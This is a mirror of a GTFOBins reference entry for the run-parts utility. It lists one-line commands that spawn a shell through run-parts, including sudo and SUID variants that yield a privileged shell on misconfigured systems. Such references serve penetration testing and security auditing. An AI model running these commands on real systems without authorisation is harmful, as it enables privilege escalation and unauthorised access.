1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/run-parts.md
2018-11-12 15:45:29 +01:00

10 lines
230 B
Markdown

---
functions:
shell:
- code: run-parts --new-session --regex '^sh$' /bin
sudo:
- code: sudo run-parts --new-session --regex '^sh$' /bin
suid:
- code: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'
---